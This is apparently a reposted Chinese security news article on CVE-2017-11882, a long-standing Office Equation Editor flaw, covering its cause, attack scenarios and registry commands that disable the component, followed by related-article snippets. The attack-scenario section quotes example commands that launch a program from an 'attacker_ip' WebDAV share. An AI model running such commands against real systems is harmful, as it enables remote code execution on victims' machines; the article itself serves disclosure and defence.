前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
圈层
工具
发布
首页
学习
活动
专区
圈层
工具
MCP广场
社区首页 >专栏 >微软Office曝存在17年之久的“全版本影响”老洞,无需用户交互实现恶意程序远程植入

微软Office曝存在17年之久的“全版本影响”老洞,无需用户交互实现恶意程序远程植入

作者头像
FB客服
发布于 2018-02-26 08:04:33
发布于 2018-02-26 08:04:33
8230
举报
文章被收录于专栏:FreeBufFreeBuf

当人们仍在着急处理“没有补丁”的微软MS Office内置DDE功能威胁时,有研究人员又发现了Office的另一个严重漏洞,攻击者可以利用该漏洞,无需受害者用户交互,远程向目标系统植入恶意软件。该漏洞属于内存破坏型漏洞,可影响微软过去17年发布的所有MS Office版本软件,包括最新的Office 365,漏洞利用能成功在包括Windows 10在内的所有微软Windows操作系统中实现。

CVE-2017-11882漏洞POC样本分析:

漏洞信息

该漏洞由Embedi公司研究员发现,漏洞可导致远程代码执行、未授权认证绕过、无需用户交互的远程恶意程序植入。目前漏洞编号CVE-2017-11882,主要漏洞部件为Office中的自带公式编辑器EQNEDT32.EXE。

由于不正确的内存操作,组件EQNEDT32.EXE会无法正确处理内存中的执行对象,这种破坏条件,致使攻击者可在当前系统登录用户环境下,利用Office远程植入恶意代码或其它恶意程序。

微软在Microsoft Office 2000中就引入了EQNEDT32.EXE组件,并保留至Microsoft Office 2007之后发布的所有Office 版本中,以确保新旧软件的文档兼容。

该漏洞的成功利用需要受害者用Office打开攻击者特制的恶意文档,如果与微软的内核提权漏洞(如CVE-2017-11847)组合利用,攻击者将会获得受害者目标系统的完全控制权。以下视频是在Windows 7,8,10系统中该漏洞的成功实现过程演示:

漏洞技术分析

详情查看Embedi分析报告《微软的难言之隐-你所不知道的漏洞》

可能的攻击场景

Embedi研究者列举了以下几种该漏洞的可攻击利用场景:

当插入一些OLE(对象链接嵌入)实体时,可能会触发该漏洞,实现一些恶意命令的执行,如向某个攻击者架设网站下载执行恶意程序等。 最直接有效的漏洞利用方式就是,访问攻击者架设或控制的WebDAV服务器,并执行其中的运行程序。 不过,攻击者还能利用该漏洞执行cmd.exe /c start \attacker_ip\ff类似恶意命令,配合入侵或启动WebClient服务。 另外,攻击者还能使用诸如\attacker_ip\ff\1.exe的命令向受害者系统中执行恶意程序,恶意程序的启动机制与\live.sysinternals.com\tools service方式类似。

缓解和修复措施

在11月的补丁修复周期中,微软针对该漏洞修改了EQNEDT32.EXE组件的内存处理机制,并发布了多个漏洞补丁更新,强烈建议用户及时进行下载更新。

鉴于EQNEDT32.EXE组件的不确定隐患,我们建议用户通过以下注册表命令来对其进行禁用:

reg add “HKLM\SOFTWARE\Microsoft\Office\Common\COM Compatibility{0002CE02-0000-0000-C000-000000000046}” /v “Compatibility Flags” /t REG_DWORD /d 0x400

如果在64位操作系统中安装了32位的MS Office软件,命令如下:

reg add “HKLM\SOFTWARE\Wow6432Node\Microsoft\Office\Common\COM Compatibility{0002CE02-0000-0000-C000-000000000046}” /v “Compatibility Flags” /t REG_DWORD /d 0x400

本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2017-11-20,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 FreeBuf 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
暂无评论
推荐阅读
编辑精选文章
换一批
CVE-2017-11882的复现、利用技巧以及修复方案
0x00 前言 最新Office的CVE-2017-11882的poc刚刚发布出来,让人眼前一亮,完美无弹窗,无视宏,影响Ms offcie全版本,对于企业来说危害很大。在此简单说下这个漏洞的复现和利用过程。各位师傅勿喷,T_T。文末附脚本 0x01 复现过程 国外最先发布的poc地址:https://github.com/embedi/CVE-2017-11882 这里我们使用的是Ridter师傅改进过的脚本:https://github.com/Ridter/CVE-2017-11882/ 生成漏洞do
ChaMd5安全团队
2018/03/29
1.7K0
CVE-2017-11882的复现、利用技巧以及修复方案
CVE-2017-11882漏洞复现
0x00 前言 参考backlion师傅的PDF,记录一下这个过程。 2017年11月14日,微软发布了11月份的安全补丁更新,其中比较引人关注的莫过于悄然修复了潜伏17年之久的Office远程代码执行漏洞(CVE-2017-11882)。该漏洞为Office内存破坏漏洞,影响目前流行的所有Office版本。攻击者可以利用漏洞以当前登录的用户的身份执行任意命令。 由于漏洞影响面较广,漏洞披露后,金睛安全研究团队持续对漏洞相关攻击事件进行关注。11月19日,监控到了已有漏洞P
用户1467662
2018/03/30
1.2K0
CVE-2017-11882漏洞复现
社工钓鱼之Office钓鱼(下)
CVE-2017-11882是微软公布的一个远程执行漏洞,该漏洞的成因是EQNEDT32.EXE进程在读入包含MathType的OLE数据时,在拷贝公式字体名称时没有对名称长度进行校验,从而造成栈缓冲区溢出,是一个非常经典的栈溢出漏洞,该漏洞主要影响以下应用:
Al1ex
2023/05/26
5470
社工钓鱼之Office钓鱼(下)
2022-02微软漏洞通告
微软官方发布了2022年02月的安全更新。本月更新公布了70个漏洞,包含17个特权提升漏洞、16个远程执行代码漏洞、6个信息泄露漏洞、5个拒绝服务漏洞、3个身份假冒漏洞、3个安全功能绕过漏洞以及1个篡改漏洞,其中50个漏洞级别为“Important”(严重)。建议用户及时使用火绒安全软件(个人/企业)【漏洞修复】功能更新补丁。
火绒安全
2022/02/10
3660
2022-02微软漏洞通告
Agent Tesla商业木马来袭,印度地区首当其冲
一. 概述 Agent Tesla源于2014年的一款键盘记录产品,演变至今,俨然成为了黑客专门用来窃密的工具软件。随着地下市场的需求增加以及攻防的对抗升级,Agent Tesla覆盖面愈来愈广,功能也愈来愈精密。 AgentTesla变种所窃密的软件多达76种,无论是浏览器、FTP、VPN、邮箱、通讯软件、下载工具、数据库无一幸免。在对抗层面,此次变种使用的手段提供了反沙箱、反虚拟机以及反windows defender的相关功能,同时诱饵文件使用了多层或分批解密,大大增加了分析难度。 Agent Tes
FB客服
2023/03/30
6330
Agent Tesla商业木马来袭,印度地区首当其冲
一个二进制POC的诞生之旅CVE-2018-0802
背景 在潜伏17年的“噩梦公式”漏洞(CVE-2017-11882)被曝光修补之后,之前的漏洞程序EQNEDT32.EXE在windows 10系统下仍然没有开启ASLR保护,因此其利用非常容易,在修补之后可以发现微软的发布的是二进制补丁而不是对该程序源码进行重新编译,因此猜测该程序的源码可能已经遗失,如果真实情况是这样,那么公式编辑器这个进程将成为其他漏洞发现和利用的“圣地”,因为微软将很难从源代码级别去排查这个程序是否还有其他漏洞。此次“噩梦公式”的姊妹篇CVE-2018-0802就在这一背景下被业界所
FB客服
2018/02/24
1.1K0
一个二进制POC的诞生之旅CVE-2018-0802
打开文档变肉鸡:潜伏17年的“噩梦公式”Office漏洞攻击分析
--------------------转载自freebuf 微软的11月份的安全补丁包含了一个隐藏17年之久的Office远程代码执行漏洞(CVE-2017-11882),该漏洞影响目前所有流行的O
昨天50还没用完
2018/06/29
6540
微软:利用0Day漏洞,黑客组织攻击北约峰会
昨天(7月11日),微软正式披露了一个未修补的零日安全漏洞,该漏洞存在于多个Windows和Office产品中,可以通过恶意Office文档远程执行代码。
FB客服
2023/08/08
5280
微软:利用0Day漏洞,黑客组织攻击北约峰会
Office CVE-2017-8570远程代码执行漏洞复现
CVE-2017-8570漏洞是一个逻辑漏洞,利用方法简单,影响范围广。由于该漏洞和三年前的SandWorm(沙虫)漏洞非常类似,因此我们称之为“沙虫”二代漏洞。 编号 CVE-2017-8570 影响版本 Microsoft Office 2007 Service Pack 3 Microsoft Office 2010 Service Pack 2 (32-bit editions) Microsoft Office 2010 Service Pack 2 (64-bit editions) Micro
FB客服
2018/02/28
1.6K0
Office CVE-2017-8570远程代码执行漏洞复现
社工钓鱼之Office钓鱼(上)
CVE-2017-8759是一个新型的Office文档高级威胁攻击漏洞,该漏洞允许恶意人士在解析SOAP WSDL的定义内容期间注入任意代码,FireEye公司对该微软Office文档进行了分析,并发现攻击者能够利用代码注入方式下载并执行一份包含PowerShell指令的Visual Basic脚本,黑客在Offcie文档中嵌入新的Moniker对象,利用的是.net库漏洞,在Office文档中加载执行远程的恶意.NET代码
Al1ex
2023/05/26
6660
社工钓鱼之Office钓鱼(上)
Office 远程溢出漏洞测试与分析
在 2017 年 11 月,微软发布的 11 月更新布丁中,微软将隐藏许久的 office 远程代码执行漏洞 (CVE-2017-11882)给修复了,由于该漏洞为一个标准的的栈溢出漏洞,原理与复现都较为简单,且影响从 Office 2000-Office 2016 几乎所有的户 Office 版本,所以吸引了当时很多人的关注。不过,虽然微软发布了该漏洞的修复补丁,但却是以二进制补丁的形式发布的,并没有以源码的形式重新进行编译, 因而并没有从源码的层面上彻底排除该漏洞, 且修复后也没有开启 DEP,仅仅增加了 ASLR,这就为我们对该类漏洞的二次开发利用提供了可能,而 CVE-2018-0802 也就是在该背景下被人发现的
信安之路
2019/09/10
1.4K0
Office 远程溢出漏洞测试与分析
CVE-2017-11882复现及防御
最新 Office 的 CVE-2017-11882,完美无弹窗,无视宏,影响 office 全版本。利用触发器 WebClient 服务从攻击者控制的 WebDav 服务器启动和执行远程文件。该脚本使用多个 OLE 对象创建简单的文档。这些对象利用 CVE-2017-11882,从而导致连续命令执行。
信安之路
2018/08/08
1.1K0
CVE-2017-11882复现及防御
近年APT组织常用的攻击漏洞
APT攻击(Advanced Persistent Threat,高级持续性威胁)是利用当下先进的攻击手法对特定目标进行长期持续性的网络攻击。APT攻击的高级体现在于精确的信息收集、高度的隐蔽性、以及使用各种复杂的网络基础设施、应用程序漏洞对对目标进行的精准打击。攻击人员的攻击形式更为高级和先进,称
HACK学习
2019/08/07
1.9K0
博览安全圈:360曝Office漏洞 微软及时回应
【IT168 资讯】为了响应国家号召,加强全民网络安全意识,我们会经常性的为大家奉上最具代表性的安全事件。 1、360曝光Office高危漏洞 微软及时发布安全更新 近日,360称发现了Office的高危漏洞(CVE-2018-0802),而根据360助理总裁、首席安全工程师郑文彬透露,CVE-2018-0802漏洞与不久前曝光的潜伏17年的 “噩梦公式”漏洞十分相似,是黑客利用Office内嵌的公式编辑器再次发起的攻击。 由于该漏洞的原理与之前被曝光的“噩梦公式”漏洞极为相似,因此该漏洞被命名为“噩梦
企鹅号小编
2018/02/07
7710
博览安全圈:360曝Office漏洞 微软及时回应
再次发现黑客利用新冠疫情实施钓鱼邮件攻击
近日,绿盟科技伏影实验室再次发现一起黑客利用新冠疫情实施钓鱼邮件攻击的案例,此次案例的攻击目标为一家位于中国台湾的POS解决方案提供商。
绿盟科技安全情报
2020/04/07
1.9K0
研究人员发现针对印度陆军的网络间谍行动
网络安全研究人员发现从2019年以来正在进行的针对印度国防部门和武装人员的网络间谍活动的新证据,目的是窃取敏感信息。
Gamma实验室
2020/12/23
6960
研究人员发现针对印度陆军的网络间谍行动
CVE-2017-11882及利用样本分析
1.本文由复眼小组ERFZE师傅原创 2.本文略微偏向基础,首先介绍了该漏洞的成因,并且分析了该漏洞在蔓灵花,摩诃草,响尾蛇APT组织用于实际攻击活动中的详细调试过程 3.本文全文字数共2234字,图片95张 预计阅读时间14分钟
Gcow安全团队
2020/03/30
1.2K0
2020第一季度安全威胁分析
卡巴斯基第一季度共发现全球203个国家/地区发起的726,536,269次攻击;识别出442,039,230个恶意URL;发现249,748起银行攻击案件;发现勒索软件攻击数量178922次;检测到164,653,290个恶意文件。针对移动设备发现1,152,662个恶意安装包;42,115个移动银行木马安装包;移动勒索软件木马4339个。
FB客服
2020/06/16
5220
2020第一季度安全威胁分析
这个 Office 漏洞的年龄可能比有些白帽子还大
能潜伏的不只有生物学上的病毒,还有网络中的病毒。 近日,宅客频道从腾讯电脑管家官方微博看到一则消息:腾讯安全反病毒实验室在全球范围内捕获了一例病毒样本,并顺藤摸瓜扒出了一个潜伏 17 年之久的 0day 漏洞——该病毒利用 Office 公式编辑器中的 0day 漏洞发动攻击,与之前 CVE-2017-11882“高龄”漏洞如出一辙,潜伏期长达 17 年之久,威胁大量 Office 版本,一旦用户打开恶意文档,无需其他操作,就会被植入后门木马,被不法分子完全控制电脑。 0Day 漏洞(Ze
企鹅号小编
2018/01/31
1.4K0
这个 Office 漏洞的年龄可能比有些白帽子还大
干货 | Office文档钓鱼的实战和免杀技巧
原文链接:https://mp.weixin.qq.com/s/OdCrUOsVAscqOjWaq2w8hQ
HACK学习
2021/12/13
8.3K0
干货 | Office文档钓鱼的实战和免杀技巧
推荐阅读
相关推荐
CVE-2017-11882的复现、利用技巧以及修复方案
更多 >
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档